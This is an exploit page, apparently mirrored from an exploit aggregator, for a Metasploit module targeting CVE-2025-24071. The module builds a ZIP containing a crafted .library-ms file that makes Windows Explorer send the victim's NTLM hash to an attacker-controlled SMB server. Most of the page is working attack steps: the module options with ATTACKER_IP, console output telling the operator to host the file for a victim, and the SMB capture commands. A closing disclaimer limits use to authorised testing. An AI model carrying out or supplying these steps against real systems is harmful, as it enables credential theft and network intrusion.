Exploit for CVE-2025-24071

## https://sploitus.com/exploit?id=7469394D-CC6C-5742-9B7E-A878B0BABF52
# Blackash-CVE-2025-24071

# CVE-2025-24071: NTLM Hash Leak via .library-ms File, Metasploit Module 🚨

# Description

Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.

# Metrics 

CNA: `Microsoft` Corporation Base Score: 6.5 MEDIUM 🟠 Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

# Overview

The vulnerability occurs when a user extracts a ZIP archive containing a specially crafted .`library-ms` file. Windows Explorer automatically initiates an SMB authentication request to a remote server specified in the file, leaking the user's NTLM hash without any user interaction.

This Metasploit module:

1. Generates a malicious .`library-ms` file.
2. Packs it into a ZIP archive.
3. Integrates with Metasploit's SMB capture functionality to collect NTLM hashes.

```
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.4.64-dev                          ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post       ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILNAME exploit.zip
FILNAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
set SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
```

# Installation:

1. Clone the repository:

```
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd CVE-2025-24071
```

# Usage:

1. Load the module:

```
use auxiliary/server/ntlm_hash_leak
```

2. Set the required options:

```
set ATTACKER_IP 192.168.1.162           # Replace with your IP address
set FILENAME exploit.zip                # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms   # Name of the .library-ms file
set SHARE_NAME shared                   # SMB share name
```

3. Run the module :

```
run
```

4. The module will generate a malicious ZIP file (exploit.zip). Host this file for the victim to download and extract.
5. Use Metasploit's SMB capture module to collect NTLM hashes:

```
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
run
```

# Disclaimer ⚠️

For educational and research purposes only. Use only against systems you own or have permission to test.